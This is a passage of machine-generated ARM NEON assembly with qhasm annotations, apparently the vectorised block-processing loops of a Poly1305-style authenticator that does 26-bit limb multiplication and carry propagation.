vmlal.u32 q7,d18,d24
# qhasm: r0[0,1] += v23[2] unsigned* 5y12[2]; r0[2,3] += v23[3] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r0=reg128#8,<v23=reg128#10%top,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r0=q7,<v23=d19,<5y12=d23
vmlal.u32 q7,d19,d23
# qhasm: r0[0,1] += v01[0] unsigned* y0[0]; r0[2,3] += v01[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r0=reg128#8,<v01=reg128#11%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r0=q7,<v01=d20,<y0=d0
vmlal.u32 q7,d20,d0
# qhasm: r0[0,1] += v01[2] unsigned* 5y34[2]; r0[2,3] += v01[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r0=reg128#8,<v01=reg128#11%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r0=q7,<v01=d21,<5y34=d25
vmlal.u32 q7,d21,d25
# qhasm: r1[0,1] += v01[0] unsigned* y12[0]; r1[2,3] += v01[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v01=reg128#11%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r1=q14,<v01=d20,<y12=d2
vmlal.u32 q14,d20,d2
# qhasm: r1[0,1] += v01[2] unsigned* y0[0]; r1[2,3] += v01[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v01=reg128#11%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r1=q14,<v01=d21,<y0=d0
vmlal.u32 q14,d21,d0
# qhasm: r1[0,1] += v23[0] unsigned* 5y34[2]; r1[2,3] += v23[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r1=reg128#15,<v23=reg128#10%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r1=q14,<v23=d18,<5y34=d25
vmlal.u32 q14,d18,d25
# qhasm: r1[0,1] += v23[2] unsigned* 5y34[0]; r1[2,3] += v23[3] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r1=reg128#15,<v23=reg128#10%top,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r1=q14,<v23=d19,<5y34=d24
vmlal.u32 q14,d19,d24
# qhasm: r1[0,1] += v4[0] unsigned* 5y12[2]; r1[2,3] += v4[1] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r1=reg128#15,<v4=reg128#4%bot,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r1=q14,<v4=d6,<5y12=d23
vmlal.u32 q14,d6,d23
# qhasm: r2[0,1] += v01[0] unsigned* y12[2]; r2[2,3] += v01[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r2=reg128#14,<v01=reg128#11%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r2=q13,<v01=d20,<y12=d3
vmlal.u32 q13,d20,d3
# qhasm: r2[0,1] += v01[2] unsigned* y12[0]; r2[2,3] += v01[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v01=reg128#11%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r2=q13,<v01=d21,<y12=d2
vmlal.u32 q13,d21,d2
# qhasm: r2[0,1] += v23[0] unsigned* y0[0]; r2[2,3] += v23[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v23=reg128#10%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r2=q13,<v23=d18,<y0=d0
vmlal.u32 q13,d18,d0
# qhasm: r2[0,1] += v23[2] unsigned* 5y34[2]; r2[2,3] += v23[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r2=reg128#14,<v23=reg128#10%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r2=q13,<v23=d19,<5y34=d25
vmlal.u32 q13,d19,d25
# qhasm: r2[0,1] += v4[0] unsigned* 5y34[0]; r2[2,3] += v4[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r2=reg128#14,<v4=reg128#4%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r2=q13,<v4=d6,<5y34=d24
vmlal.u32 q13,d6,d24
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#3,<two24=stack128#1
# asm 2: lea >ptr=r2,<two24=[sp,#0]
add r2,sp,#0
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#4,<r0=reg128#8,#26
# asm 2: vshr.u64 >t1=q3,<r0=q7,#26
vshr.u64 q3,q7,#26
# qhasm: len -= 64
# asm 1: sub >len=int32#4,<len=int32#4,#64
# asm 2: sub >len=r3,<len=r3,#64
sub r3,r3,#64
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#6,<r0=reg128#8,<mask=reg128#7
# asm 2: vand >r0=q5,<r0=q7,<mask=q6
vand q5,q7,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#15,<t1=reg128#4
# asm 2: vadd.i64 >r1=q3,<r1=q14,<t1=q3
vadd.i64 q3,q14,q3
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#8,<r3=reg128#5,#26
# asm 2: vshr.u64 >t4=q7,<r3=q4,#26
vshr.u64 q7,q4,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#5,<r3=reg128#5,<mask=reg128#7
# asm 2: vand >r3=q4,<r3=q4,<mask=q6
vand q4,q4,q6
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#8,<r4=reg128#16,<t4=reg128#8
# asm 2: vadd.i64 >x4=q7,<r4=q15,<t4=q7
vadd.i64 q7,q15,q7
# qhasm: r4 aligned= mem128[ptr]
# asm 1: vld1.8 {>r4=reg128#16%bot->r4=reg128#16%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>r4=d30->r4=d31},[<ptr=r2,: 128]
vld1.8 {d30-d31},[r2,: 128]
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#9,<r1=reg128#4,#26
# asm 2: vshr.u64 >t2=q8,<r1=q3,#26
vshr.u64 q8,q3,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#4,<r1=reg128#4,<mask=reg128#7
# asm 2: vand >r1=q3,<r1=q3,<mask=q6
vand q3,q3,q6
# qhasm: 2x t0 = x4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#10,<x4=reg128#8,#26
# asm 2: vshr.u64 >t0=q9,<x4=q7,#26
vshr.u64 q9,q7,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#9,<r2=reg128#14,<t2=reg128#9
# asm 2: vadd.i64 >r2=q8,<r2=q13,<t2=q8
vadd.i64 q8,q13,q8
# qhasm: x4 &= mask
# asm 1: vand >x4=reg128#11,<x4=reg128#8,<mask=reg128#7
# asm 2: vand >x4=q10,<x4=q7,<mask=q6
vand q10,q7,q6
# qhasm: 2x x01 = r0 + t0
# asm 1: vadd.i64 >x01=reg128#6,<r0=reg128#6,<t0=reg128#10
# asm 2: vadd.i64 >x01=q5,<r0=q5,<t0=q9
vadd.i64 q5,q5,q9
# qhasm: r0 aligned= mem128[ptr]
# asm 1: vld1.8 {>r0=reg128#8%bot->r0=reg128#8%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>r0=d14->r0=d15},[<ptr=r2,: 128]
vld1.8 {d14-d15},[r2,: 128]
# qhasm: ptr = &z34_stack
# asm 1: lea >ptr=int32#3,<z34_stack=stack128#9
# asm 2: lea >ptr=r2,<z34_stack=[sp,#128]
add r2,sp,#128
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#10,<t0=reg128#10,#2
# asm 2: vshl.i64 >t0=q9,<t0=q9,#2
vshl.i64 q9,q9,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#14,<r2=reg128#9,#26
# asm 2: vshr.u64 >t3=q13,<r2=q8,#26
vshr.u64 q13,q8,#26
# qhasm: 2x x01 += t0
# asm 1: vadd.i64 >x01=reg128#15,<x01=reg128#6,<t0=reg128#10
# asm 2: vadd.i64 >x01=q14,<x01=q5,<t0=q9
vadd.i64 q14,q5,q9
# qhasm: z34 aligned= mem128[ptr]
# asm 1: vld1.8 {>z34=reg128#6%bot->z34=reg128#6%top},[<ptr=int32#3,: 128]
# asm 2: vld1.8 {>z34=d10->z34=d11},[<ptr=r2,: 128]
vld1.8 {d10-d11},[r2,: 128]
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#9,<mask=reg128#7
# asm 2: vand >x23=q9,<r2=q8,<mask=q6
vand q9,q8,q6
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#5,<r3=reg128#5,<t3=reg128#14
# asm 2: vadd.i64 >r3=q4,<r3=q4,<t3=q13
vadd.i64 q4,q4,q13
# qhasm: input_2 += 32
# asm 1: add >input_2=int32#2,<input_2=int32#2,#32
# asm 2: add >input_2=r1,<input_2=r1,#32
add r1,r1,#32
# qhasm: 2x t1 = x01 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#14,<x01=reg128#15,#26
# asm 2: vshr.u64 >t1=q13,<x01=q14,#26
vshr.u64 q13,q14,#26
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: x01 = x01 & mask
# asm 1: vand >x01=reg128#9,<x01=reg128#15,<mask=reg128#7
# asm 2: vand >x01=q8,<x01=q14,<mask=q6
vand q8,q14,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#4,<t1=reg128#14
# asm 2: vadd.i64 >r1=q3,<r1=q3,<t1=q13
vadd.i64 q3,q3,q13
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#14,<r3=reg128#5,#26
# asm 2: vshr.u64 >t4=q13,<r3=q4,#26
vshr.u64 q13,q4,#26
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#9%bot,<x01=reg128#9%top
# asm 2: vtrn.32 <x01=d16,<x01=d17
vtrn.32 d16,d17
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#5,<r3=reg128#5,<mask=reg128#7
# asm 2: vand >r3=q4,<r3=q4,<mask=q6
vand q4,q4,q6
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#4%bot,<r1=reg128#4%top
# asm 2: vtrn.32 <r1=d6,<r1=d7
vtrn.32 d6,d7
# qhasm: 2x x4 += t4
# asm 1: vadd.i64 >x4=reg128#11,<x4=reg128#11,<t4=reg128#14
# asm 2: vadd.i64 >x4=q10,<x4=q10,<t4=q13
vadd.i64 q10,q10,q13
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#5%bot,<r3=reg128#5%top
# asm 2: vtrn.32 <r3=d8,<r3=d9
vtrn.32 d8,d9
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#9%top,<r1=reg128#4%bot,<r1=reg128#4%bot,#0
# asm 2: vext.32 <x01=d17,<r1=d6,<r1=d6,#0
vext.32 d17,d6,d6,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#5%bot,<r3=reg128#5%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d8,<r3=d8,#0
vext.32 d19,d8,d8,#0
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#11%bot,<x4=reg128#11%top
# asm 2: vtrn.32 <x4=d20,<x4=d21
vtrn.32 d20,d21
# qhasm: unsigned>? len - 64
# asm 1: cmp <len=int32#4,#64
# asm 2: cmp <len=r3,#64
cmp r3,#64
# qhasm: goto mainloop2 if unsigned>
bhi ._mainloop2
# qhasm: input_2 -= 32
# asm 1: sub >input_2=int32#3,<input_2=int32#2,#32
# asm 2: sub >input_2=r2,<input_2=r1,#32
sub r2,r1,#32
# qhasm: below64bytes:
._below64bytes:
# qhasm: unsigned>? len - 32
# asm 1: cmp <len=int32#4,#32
# asm 2: cmp <len=r3,#32
cmp r3,#32
# qhasm: goto end if !unsigned>
bls ._end
# qhasm: mainloop:
._mainloop:
# qhasm: new r0
# qhasm: ptr = &two24
# asm 1: lea >ptr=int32#2,<two24=stack128#1
# asm 2: lea >ptr=r1,<two24=[sp,#0]
add r1,sp,#0
# qhasm: r4 aligned= mem128[ptr]
# asm 1: vld1.8 {>r4=reg128#5%bot->r4=reg128#5%top},[<ptr=int32#2,: 128]
# asm 2: vld1.8 {>r4=d8->r4=d9},[<ptr=r1,: 128]
vld1.8 {d8-d9},[r1,: 128]
# qhasm: u4 aligned= mem128[ptr]
# asm 1: vld1.8 {>u4=reg128#6%bot->u4=reg128#6%top},[<ptr=int32#2,: 128]
# asm 2: vld1.8 {>u4=d10->u4=d11},[<ptr=r1,: 128]
vld1.8 {d10-d11},[r1,: 128]
# qhasm: c01 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c01=reg128#8%bot->c01=reg128#8%top},[<input_2=int32#3]!
# asm 2: vld1.8 {>c01=d14->c01=d15},[<input_2=r2]!
vld1.8 {d14-d15},[r2]!
# qhasm: r4[0,1] += x01[0] unsigned* y34[2]; r4[2,3] += x01[1] unsigned* y34[3]
# asm 1: vmlal.u32 <r4=reg128#5,<x01=reg128#9%bot,<y34=reg128#3%top
# asm 2: vmlal.u32 <r4=q4,<x01=d16,<y34=d5
vmlal.u32 q4,d16,d5
# qhasm: c23 = mem128[input_2];input_2+=16
# asm 1: vld1.8 {>c23=reg128#14%bot->c23=reg128#14%top},[<input_2=int32#3]!
# asm 2: vld1.8 {>c23=d26->c23=d27},[<input_2=r2]!
vld1.8 {d26-d27},[r2]!
# qhasm: r4[0,1] += x01[2] unsigned* y34[0]; r4[2,3] += x01[3] unsigned* y34[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x01=reg128#9%top,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r4=q4,<x01=d17,<y34=d4
vmlal.u32 q4,d17,d4
# qhasm: r0 = u4[1]c01[0]r0[2,3]
# asm 1: vext.32 <r0=reg128#4%bot,<u4=reg128#6%bot,<c01=reg128#8%bot,#1
# asm 2: vext.32 <r0=d6,<u4=d10,<c01=d14,#1
vext.32 d6,d10,d14,#1
# qhasm: r4[0,1] += x23[0] unsigned* y12[2]; r4[2,3] += x23[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r4=reg128#5,<x23=reg128#10%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r4=q4,<x23=d18,<y12=d3
vmlal.u32 q4,d18,d3
# qhasm: r0 = r0[0,1]u4[1]c23[0]
# asm 1: vext.32 <r0=reg128#4%top,<u4=reg128#6%bot,<c23=reg128#14%bot,#1
# asm 2: vext.32 <r0=d7,<u4=d10,<c23=d26,#1
vext.32 d7,d10,d26,#1
# qhasm: r4[0,1] += x23[2] unsigned* y12[0]; r4[2,3] += x23[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x23=reg128#10%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r4=q4,<x23=d19,<y12=d2
vmlal.u32 q4,d19,d2
# qhasm: r0 = r0[1]r0[0]r0[3]r0[2]
# asm 1: vrev64.i32 >r0=reg128#4,<r0=reg128#4
# asm 2: vrev64.i32 >r0=q3,<r0=q3
vrev64.i32 q3,q3
# qhasm: r4[0,1] += x4[0] unsigned* y0[0]; r4[2,3] += x4[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x4=reg128#11%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r4=q4,<x4=d20,<y0=d0
vmlal.u32 q4,d20,d0
# qhasm: r0[0,1] += x4[0] unsigned* 5y12[0]; r0[2,3] += x4[1] unsigned* 5y12[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x4=reg128#11%bot,<5y12=reg128#12%bot
# asm 2: vmlal.u32 <r0=q3,<x4=d20,<5y12=d22
vmlal.u32 q3,d20,d22
# qhasm: r0[0,1] += x23[0] unsigned* 5y34[0]; r0[2,3] += x23[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x23=reg128#10%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r0=q3,<x23=d18,<5y34=d24
vmlal.u32 q3,d18,d24
# qhasm: r0[0,1] += x23[2] unsigned* 5y12[2]; r0[2,3] += x23[3] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r0=reg128#4,<x23=reg128#10%top,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r0=q3,<x23=d19,<5y12=d23
vmlal.u32 q3,d19,d23
# qhasm: c01 c23 = c01[0]c23[0]c01[2]c23[2]c01[1]c23[1]c01[3]c23[3]
# asm 1: vtrn.32 <c01=reg128#8,<c23=reg128#14
# asm 2: vtrn.32 <c01=q7,<c23=q13
vtrn.32 q7,q13
# qhasm: r0[0,1] += x01[0] unsigned* y0[0]; r0[2,3] += x01[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x01=reg128#9%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r0=q3,<x01=d16,<y0=d0
vmlal.u32 q3,d16,d0
# qhasm: r3[0,1] = c23[2]<<18; r3[2,3] = c23[3]<<18
# asm 1: vshll.u32 >r3=reg128#6,<c23=reg128#14%top,#18
# asm 2: vshll.u32 >r3=q5,<c23=d27,#18
vshll.u32 q5,d27,#18
# qhasm: r0[0,1] += x01[2] unsigned* 5y34[2]; r0[2,3] += x01[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r0=reg128#4,<x01=reg128#9%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r0=q3,<x01=d17,<5y34=d25
vmlal.u32 q3,d17,d25
# qhasm: r3[0,1] += x01[0] unsigned* y34[0]; r3[2,3] += x01[1] unsigned* y34[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x01=reg128#9%bot,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r3=q5,<x01=d16,<y34=d4
vmlal.u32 q5,d16,d4
# qhasm: r3[0,1] += x01[2] unsigned* y12[2]; r3[2,3] += x01[3] unsigned* y12[3]
# asm 1: vmlal.u32 <r3=reg128#6,<x01=reg128#9%top,<y12=reg128#2%top
# asm 2: vmlal.u32 <r3=q5,<x01=d17,<y12=d3
vmlal.u32 q5,d17,d3
# qhasm: r3[0,1] += x23[0] unsigned* y12[0]; r3[2,3] += x23[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x23=reg128#10%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r3=q5,<x23=d18,<y12=d2
vmlal.u32 q5,d18,d2
# qhasm: r3[0,1] += x23[2] unsigned* y0[0]; r3[2,3] += x23[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x23=reg128#10%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r3=q5,<x23=d19,<y0=d0
vmlal.u32 q5,d19,d0
# qhasm: r1[0,1] = c23[0]<<6; r1[2,3] = c23[1]<<6
# asm 1: vshll.u32 >r1=reg128#14,<c23=reg128#14%bot,#6
# asm 2: vshll.u32 >r1=q13,<c23=d26,#6
vshll.u32 q13,d26,#6
# qhasm: r3[0,1] += x4[0] unsigned* 5y34[2]; r3[2,3] += x4[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r3=reg128#6,<x4=reg128#11%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r3=q5,<x4=d20,<5y34=d25
vmlal.u32 q5,d20,d25
# qhasm: r1[0,1] += x01[0] unsigned* y12[0]; r1[2,3] += x01[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x01=reg128#9%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r1=q13,<x01=d16,<y12=d2
vmlal.u32 q13,d16,d2
# qhasm: r1[0,1] += x01[2] unsigned* y0[0]; r1[2,3] += x01[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x01=reg128#9%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r1=q13,<x01=d17,<y0=d0
vmlal.u32 q13,d17,d0
# qhasm: r1[0,1] += x23[0] unsigned* 5y34[2]; r1[2,3] += x23[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r1=reg128#14,<x23=reg128#10%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r1=q13,<x23=d18,<5y34=d25
vmlal.u32 q13,d18,d25
# qhasm: r1[0,1] += x23[2] unsigned* 5y34[0]; r1[2,3] += x23[3] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x23=reg128#10%top,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r1=q13,<x23=d19,<5y34=d24
vmlal.u32 q13,d19,d24
# qhasm: r2[0,1] = c01[2]<<12; r2[2,3] = c01[3]<<12
# asm 1: vshll.u32 >r2=reg128#8,<c01=reg128#8%top,#12
# asm 2: vshll.u32 >r2=q7,<c01=d15,#12
vshll.u32 q7,d15,#12
# qhasm: r1[0,1] += x4[0] unsigned* 5y12[2]; r1[2,3] += x4[1] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r1=reg128#14,<x4=reg128#11%bot,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r1=q13,<x4=d20,<5y12=d23
vmlal.u32 q13,d20,d23
# qhasm: r2[0,1] += x01[0] unsigned* y12[2]; r2[2,3] += x01[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r2=reg128#8,<x01=reg128#9%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r2=q7,<x01=d16,<y12=d3
vmlal.u32 q7,d16,d3
# qhasm: r2[0,1] += x01[2] unsigned* y12[0]; r2[2,3] += x01[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x01=reg128#9%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r2=q7,<x01=d17,<y12=d2
vmlal.u32 q7,d17,d2
# qhasm: r2[0,1] += x23[0] unsigned* y0[0]; r2[2,3] += x23[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x23=reg128#10%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r2=q7,<x23=d18,<y0=d0
vmlal.u32 q7,d18,d0
# qhasm: r2[0,1] += x23[2] unsigned* 5y34[2]; r2[2,3] += x23[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r2=reg128#8,<x23=reg128#10%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r2=q7,<x23=d19,<5y34=d25
vmlal.u32 q7,d19,d25
# qhasm: r2[0,1] += x4[0] unsigned* 5y34[0]; r2[2,3] += x4[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x4=reg128#11%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r2=q7,<x4=d20,<5y34=d24
vmlal.u32 q7,d20,d24
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#9,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q8,<r0=q3,#26
vshr.u64 q8,q3,#26
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#4,<r0=reg128#4,<mask=reg128#7
# asm 2: vand >r0=q3,<r0=q3,<mask=q6
vand q3,q3,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#9,<r1=reg128#14,<t1=reg128#9
# asm 2: vadd.i64 >r1=q8,<r1=q13,<t1=q8
vadd.i64 q8,q13,q8
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#10,<r3=reg128#6,#26
# asm 2: vshr.u64 >t4=q9,<r3=q5,#26
vshr.u64 q9,q5,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#6,<r3=reg128#6,<mask=reg128#7
# asm 2: vand >r3=q5,<r3=q5,<mask=q6
vand q5,q5,q6
# qhasm: 2x r4 += t4
# asm 1: vadd.i64 >r4=reg128#5,<r4=reg128#5,<t4=reg128#10
# asm 2: vadd.i64 >r4=q4,<r4=q4,<t4=q9
vadd.i64 q4,q4,q9
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#10,<r1=reg128#9,#26
# asm 2: vshr.u64 >t2=q9,<r1=q8,#26
vshr.u64 q9,q8,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#11,<r1=reg128#9,<mask=reg128#7
# asm 2: vand >r1=q10,<r1=q8,<mask=q6
vand q10,q8,q6
# qhasm: 2x t0 = r4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#9,<r4=reg128#5,#26
# asm 2: vshr.u64 >t0=q8,<r4=q4,#26
vshr.u64 q8,q4,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#8,<r2=reg128#8,<t2=reg128#10
# asm 2: vadd.i64 >r2=q7,<r2=q7,<t2=q9
vadd.i64 q7,q7,q9
# qhasm: r4 &= mask
# asm 1: vand >r4=reg128#5,<r4=reg128#5,<mask=reg128#7
# asm 2: vand >r4=q4,<r4=q4,<mask=q6
vand q4,q4,q6
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#9
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q8
vadd.i64 q3,q3,q8
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#9,<t0=reg128#9,#2
# asm 2: vshl.i64 >t0=q8,<t0=q8,#2
vshl.i64 q8,q8,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#14,<r2=reg128#8,#26
# asm 2: vshr.u64 >t3=q13,<r2=q7,#26
vshr.u64 q13,q7,#26
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#9
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q8
vadd.i64 q3,q3,q8
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#8,<mask=reg128#7
# asm 2: vand >x23=q9,<r2=q7,<mask=q6
vand q9,q7,q6
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#6,<r3=reg128#6,<t3=reg128#14
# asm 2: vadd.i64 >r3=q5,<r3=q5,<t3=q13
vadd.i64 q5,q5,q13
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#8,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q7,<r0=q3,#26
vshr.u64 q7,q3,#26
# qhasm: x01 = r0 & mask
# asm 1: vand >x01=reg128#9,<r0=reg128#4,<mask=reg128#7
# asm 2: vand >x01=q8,<r0=q3,<mask=q6
vand q8,q3,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#11,<t1=reg128#8
# asm 2: vadd.i64 >r1=q3,<r1=q10,<t1=q7
vadd.i64 q3,q10,q7
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#8,<r3=reg128#6,#26
# asm 2: vshr.u64 >t4=q7,<r3=q5,#26
vshr.u64 q7,q5,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#6,<r3=reg128#6,<mask=reg128#7
# asm 2: vand >r3=q5,<r3=q5,<mask=q6
vand q5,q5,q6
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#11,<r4=reg128#5,<t4=reg128#8
# asm 2: vadd.i64 >x4=q10,<r4=q4,<t4=q7
vadd.i64 q10,q4,q7
# qhasm: len -= 32
# asm 1: sub >len=int32#4,<len=int32#4,#32
# asm 2: sub >len=r3,<len=r3,#32
sub r3,r3,#32
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#9%bot,<x01=reg128#9%top
# asm 2: vtrn.32 <x01=d16,<x01=d17
vtrn.32 d16,d17
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#4%bot,<r1=reg128#4%top
# asm 2: vtrn.32 <r1=d6,<r1=d7
vtrn.32 d6,d7
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#6%bot,<r3=reg128#6%top
# asm 2: vtrn.32 <r3=d10,<r3=d11
vtrn.32 d10,d11
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#11%bot,<x4=reg128#11%top
# asm 2: vtrn.32 <x4=d20,<x4=d21
vtrn.32 d20,d21
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#9%top,<r1=reg128#4%bot,<r1=reg128#4%bot,#0
# asm 2: vext.32 <x01=d17,<r1=d6,<r1=d6,#0
vext.32 d17,d6,d6,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#6%bot,<r3=reg128#6%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d10,<r3=d10,#0
vext.32 d19,d10,d10,#0
# qhasm: unsigned>? len - 32
# asm 1: cmp <len=int32#4,#32
# asm 2: cmp <len=r3,#32
cmp r3,#32
# qhasm: goto mainloop if unsigned>
bhi ._mainloop
# qhasm: end:
